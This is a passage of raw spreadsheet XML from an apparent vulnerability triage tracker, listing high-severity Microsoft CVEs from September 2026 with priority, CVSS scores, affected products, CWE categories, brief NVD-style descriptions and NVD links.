s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S126" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t></is></c></row><row r="127"><c r="A127" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B127" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C127" s="5" t="inlineStr"><is><t>CVE-2026-67643</t></is></c><c r="D127" s="5" t="n"><v>8.800000000000001</v></c><c r="E127" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F127" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G127" s="5" t="inlineStr" /><c r="H127" s="5" t="n"><v>0.008</v></c><c r="I127" s="5" t="inlineStr" /><c r="J127" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K127" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L127" s="5" t="inlineStr" /><c r="M127" s="5" t="inlineStr" /><c r="N127" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P127" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q127" s="5" t="inlineStr" /><c r="R127" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S127" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t></is></c></row><row r="128"><c r="A128" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B128" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C128" s="5" t="inlineStr"><is><t>CVE-2026-68775</t></is></c><c r="D128" s="5" t="n"><v>8.800000000000001</v></c><c r="E128" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F128" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G128" s="5" t="inlineStr" /><c r="H128" s="5" t="n"><v>0.005</v></c><c r="I128" s="5" t="inlineStr" /><c r="J128" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K128" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L128" s="5" t="inlineStr" /><c r="M128" s="5" t="inlineStr" /><c r="N128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P128" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q128" s="5" t="inlineStr" /><c r="R128" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S128" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t></is></c></row><row r="129"><c r="A129" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B129" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C129" s="5" t="inlineStr"><is><t>CVE-2026-68786</t></is></c><c r="D129" s="5" t="n"><v>8.800000000000001</v></c><c r="E129" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F129" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G129" s="5" t="inlineStr" /><c r="H129" s="5" t="n"><v>0.005</v></c><c r="I129" s="5" t="inlineStr" /><c r="J129" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K129" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L129" s="5" t="inlineStr" /><c r="M129" s="5" t="inlineStr" /><c r="N129" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P129" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q129" s="5" t="inlineStr" /><c r="R129" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S129" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t></is></c></row><row r="130"><c r="A130" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B130" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C130" s="5" t="inlineStr"><is><t>CVE-2026-68828</t></is></c><c r="D130" s="5" t="n"><v>8.800000000000001</v></c><c r="E130" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F130" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G130" s="5" t="inlineStr" /><c r="H130" s="5" t="n"><v>0.004</v></c><c r="I130" s="5" t="inlineStr" /><c r="J130" s="5" t="inlineStr" /><c r="K130" s="5" t="inlineStr" /><c r="L130" s="5" t="inlineStr" /><c r="M130" s="5" t="inlineStr" /><c r="N130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O130" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P130" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q130" s="5" t="inlineStr" /><c r="R130" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S130" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68828</t></is></c></row><row r="131"><c r="A131" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B131" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C131" s="5" t="inlineStr"><is><t>CVE-2026-69266</t></is></c><c r="D131" s="5" t="n"><v>8.800000000000001</v></c><c r="E131" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F131" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G131" s="5" t="inlineStr" /><c r="H131" s="5" t="n"><v>0.004</v></c><c r="I131" s="5" t="inlineStr" /><c r="J131" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K131" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L131" s="5" t="inlineStr" /><c r="M131" s="5" t="inlineStr" /><c r="N131" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O131" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P131" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q131" s="5" t="inlineStr" /><c r="R131" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S131" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t></is></c></row><row r="132"><c r="A132" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B132" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C132" s="5" t="inlineStr"><is><t>CVE-2026-69268</t></is></c><c r="D132" s="5" t="n"><v>8.800000000000001</v></c><c r="E132" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F132" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G132" s="5" t="inlineStr" /><c r="H132" s="5" t="n"><v>0.007</v></c><c r="I132" s="5" t="inlineStr" /><c r="J132" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K132" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L132" s="5" t="inlineStr" /><c r="M132" s="5" t="inlineStr" /><c r="N132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P132" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q132" s="5" t="inlineStr" /><c r="R132" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S132" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t></is></c></row><row r="133"><c r="A133" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B133" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C133" s="5" t="inlineStr"><is><t>CVE-2026-69273</t></is></c><c r="D133" s="5" t="n"><v>8.800000000000001</v></c><c r="E133" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F133" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G133" s="5" t="inlineStr" /><c r="H133" s="5" t="n"><v>0.005</v></c><c r="I133" s="5" t="inlineStr" /><c r="J133" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K133" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L133" s="5" t="inlineStr" /><c r="M133" s="5" t="inlineStr" /><c r="N133" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O133" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P133" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q133" s="5" t="inlineStr" /><c r="R133" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S133" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T133" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t></is></c></row><row r="134"><c r="A134" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B134" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C134" s="5" t="inlineStr"><is><t>CVE-2026-69282</t></is></c><c r="D134" s="5" t="n"><v>8.800000000000001</v></c><c r="E134" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F134" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G134" s="5" t="inlineStr" /><c r="H134" s="5" t="n"><v>0.005</v></c><c r="I134" s="5" t="inlineStr" /><c r="J134" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K134" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L134" s="5" t="inlineStr" /><c r="M134" s="5" t="inlineStr" /><c r="N134" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O134" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P134" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q134" s="5" t="inlineStr" /><c r="R134" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S134" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t></is></c></row><row r="135"><c r="A135" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B135" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C135" s="5" t="inlineStr"><is><t>CVE-2026-69285</t></is></c><c r="D135" s="5" t="n"><v>8.800000000000001</v></c><c r="E135" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F135" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G135" s="5" t="inlineStr" /><c r="H135" s="5" t="n"><v>0.006</v></c><c r="I135" s="5" t="inlineStr" /><c r="J135" s="5" t="inlineStr" /><c r="K135" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L135" s="5" t="inlineStr" /><c r="M135" s="5" t="inlineStr" /><c r="N135" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P135" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q135" s="5" t="inlineStr" /><c r="R135" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S135" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69285</t></is></c></row><row r="136"><c r="A136" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B136" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C136" s="5" t="inlineStr"><is><t>CVE-2026-69291</t></is></c><c r="D136" s="5" t="n"><v>8.800000000000001</v></c><c r="E136" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F136" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G136" s="5" t="inlineStr" /><c r="H136" s="5" t="n"><v>0.006</v></c><c r="I136" s="5" t="inlineStr" /><c r="J136" s="5" t="inlineStr" /><c r="K136" s="5" t="inlineStr" /><c r="L136" s="5" t="inlineStr" /><c r="M136" s="5" t="inlineStr" /><c r="N136" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O136" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P136" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q136" s="5" t="inlineStr" /><c r="R136" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S136" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t></is></c></row><row r="137"><c r="A137" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B137" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C137" s="5" t="inlineStr"><is><t>CVE-2026-69334</t></is></c><c r="D137" s="5" t="n"><v>8.800000000000001</v></c><c r="E137" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F137" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G137" s="5" t="inlineStr" /><c r="H137" s="5" t="n"><v>0.008</v></c><c r="I137" s="5" t="inlineStr" /><c r="J137" s="5" t="inlineStr" /><c r="K137" s="5" t="inlineStr" /><c r="L137" s="5" t="inlineStr" /><c r="M137" s="5" t="inlineStr" /><c r="N137" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O137" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P137" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q137" s="5" t="inlineStr" /><c r="R137" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S137" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69334</t></is></c></row><row r="138"><c r="A138" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B138" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C138" s="5" t="inlineStr"><is><t>CVE-2026-69355</t></is></c><c r="D138" s="5" t="n"><v>8.800000000000001</v></c><c r="E138" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F138" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G138" s="5" t="inlineStr" /><c r="H138" s="5" t="n"><v>0.008</v></c><c r="I138" s="5" t="inlineStr" /><c r="J138" s="5" t="inlineStr" /><c r="K138" s="5" t="inlineStr" /><c r="L138" s="5" t="inlineStr" /><c r="M138" s="5" t="inlineStr" /><c r="N138" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O138" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P138" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q138" s="5" t="inlineStr" /><c r="R138" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S138" s="5" t="inlineStr"><is><t>External control of file name or path in Microsoft Exchange Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69355</t></is></c></row><row r="139"><c r="A139" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B139" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C139" s="5" t="inlineStr"><is><t>CVE-2026-69360</t></is></c><c r="D139" s="5" t="n"><v>8.800000000000001</v></c><c r="E139" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F139" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G139" s="5" t="inlineStr" /><c r="H139" s="5" t="n"><v>0.008</v></c><c r="I139" s="5" t="inlineStr" /><c r="J139" s="5" t="inlineStr" /><c r="K139" s="5" t="inlineStr" /><c r="L139" s="5" t="inlineStr" /><c r="M139" s="5" t="inlineStr" /><c r="N139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O139" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P139" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q139" s="5" t="inlineStr" /><c r="R139" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S139" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T139" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69360</t></is></c></row><row r="140"><c r="A140" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B140" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C140" s="5" t="inlineStr"><is><t>CVE-2026-69386</t></is></c><c r="D140" s="5" t="n"><v>8.800000000000001</v></c><c r="E140" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F140" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G140" s="5" t="inlineStr" /><c r="H140" s="5" t="n"><v>0.008</v></c><c r="I140" s="5" t="inlineStr" /><c r="J140" s="5" t="inlineStr" /><c r="K140" s="5" t="inlineStr" /><c r="L140" s="5" t="inlineStr" /><c r="M140" s="5" t="inlineStr" /><c r="N140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O140" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P140" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q140" s="5" t="inlineStr" /><c r="R140" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S140" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T140" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69386</t></is></c></row><row r="141"><c r="A141" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B141" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C141" s="5" t="inlineStr"><is><t>CVE-2026-69434</t></is></c><c r="D141" s="5" t="n"><v>8.800000000000001</v></c><c r="E141" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F141" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G141" s="5" t="inlineStr" /><c r="H141" s="5" t="n"><v>0.008</v></c><c r="I141" s="5" t="inlineStr" /><c r="J141" s="5" t="inlineStr" /><c r="K141" s="5" t="inlineStr" /><c r="L141" s="5" t="inlineStr" /><c r="M141" s="5" t="inlineStr" /><c r="N141" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O141" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P141" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q141" s="5" t="inlineStr" /><c r="R141" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S141" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows URL Moniker allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T141" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69434</t></is></c></row><row r="142"><c r="A142" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B142" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C142" s="5" t="inlineStr"><is><t>CVE-2026-69439</t></is></c><c r="D142" s="5" t="n"><v>8.800000000000001</v></c><c r="E142" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F142" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G142" s="5" t="inlineStr" /><c r="H142" s="5" t="n"><v>0.007</v></c><c r="I142" s="5" t="inlineStr" /><c r="J142" s="5" t="inlineStr" /><c r="K142" s="5" t="inlineStr" /><c r="L142" s="5" t="inlineStr" /><c r="M142" s="5" t="inlineStr" /><c r="N142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P142" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q142" s="5" t="inlineStr" /><c r="R142" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S142" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T142" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t></is></c></row><row r="143"><c r="A143" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B143" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C143" s="5" t="inlineStr"><is><t>CVE-2026-69442</t></is></c><c r="D143" s="5" t="n"><v>8.800000000000001</v></c><c r="E143" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F143" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G143" s="5" t="inlineStr" /><c r="H143" s="5" t="n"><v>0.008</v></c><c r="I143" s="5" t="inlineStr" /><c r="J143" s="5" t="inlineStr" /><c r="K143" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L143" s="5" t="inlineStr" /><c r="M143" s="5" t="inlineStr" /><c r="N143" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O143" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P143" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q143" s="5" t="inlineStr" /><c r="R143" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S143" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T143" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69442</t></is></c></row><row r="144"><c r="A144" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B144" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C144" s="5" t="inlineStr"><is><t>CVE-2026-69461</t></is></c><c r="D144" s="5" t="n"><v>8.800000000000001</v></c><c r="E144" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F144" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G144" s="5" t="inlineStr" /><c r="H144" s="5" t="n"><v>0.008</v></c><c r="I144" s="5" t="inlineStr" /><c r="J144" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1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 s="5" t="inlineStr" /><c r="M144" s="5" t="inlineStr" /><c r="N144" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O144" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P144" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q144" s="5" t="inlineStr" /><c r="R144" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S144" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T144" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t></is></c></row><row r="145"><c r="A145" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B145" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C145" s="5" t="inlineStr"><is><t>CVE-2026-69464</t></is></c><c r="D145" s="5" t="n"><v>8.800000000000001</v></c><c r="E145" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F145" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G145" s="5" t="inlineStr" /><c r="H145" s="5" t="n"><v>0.008999999999999999</v></c><c r="I145" s="5" t="inlineStr" /><c r="J145" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K145" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L145" s="5" t="inlineStr" /><c r="M145" s="5" t="inlineStr" /><c r="N145" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O145" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P145" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q145" s="5" t="inlineStr" /><c r="R145" s="5" t="inlineStr"><is><t>CWE-250</t></is></c><c r="S145" s="5" t="inlineStr"><is><t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T145" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t></is></c></row><row r="146"><c r="A146" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B146" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C146" s="5" t="inlineStr"><is><t>CVE-2026-69465</t></is></c><c r="D146" s="5" t="n"><v>8.800000000000001</v></c><c r="E146" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F146" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G146" s="5" t="inlineStr" /><c r="H146" s="5" t="n"><v>0.008</v></c><c r="I146" s="5" t="inlineStr" /><c r="J146" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K146" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L146" s="5" t="inlineStr" /><c r="M146" s="5" t="inlineStr" /><c r="N146" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O146" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P146" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q146" s="5" t="inlineStr" /><c r="R146" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S146" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T146" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t></is></c></row><row r="147"><c r="A147" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B147" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C147" s="5" t="inlineStr"><is><t>CVE-2026-69485</t></is></c><c r="D147" s="5" t="n"><v>8.800000000000001</v></c><c r="E147" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F147" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G147" s="5" t="inlineStr" /><c r="H147" s="5" t="n"><v>0.008999999999999999</v></c><c r="I147" s="5" t="inlineStr" /><c r="J147" s="5" t="inlineStr" /><c r="K147" s="5" t="inlineStr" /><c r="L147" s="5" t="inlineStr" /><c r="M147" s="5" t="inlineStr" /><c r="N147" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O147" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P147" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q147" s="5" t="inlineStr" /><c r="R147" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S147" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t></is></c><c r="T147" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69485</t></is></c></row><row r="148"><c r="A148" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B148" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C148" s="5" t="inlineStr"><is><t>CVE-2026-69494</t></is></c><c r="D148" s="5" t="n"><v>8.800000000000001</v></c><c r="E148" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F148" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G148" s="5" t="inlineStr" /><c r="H148" s="5" t="n"><v>0.008</v></c><c r="I148" s="5" t="inlineStr" /><c r="J148" s="5" t="inlineStr" /><c r="K148" s="5" t="inlineStr" /><c r="L148" s="5" t="inlineStr" /><c r="M148" s="5" t="inlineStr" /><c r="N148" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O148" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P148" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q148" s="5" t="inlineStr" /><c r="R148" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S148" s="5" t="inlineStr"><is><t>Out-of-bounds read in 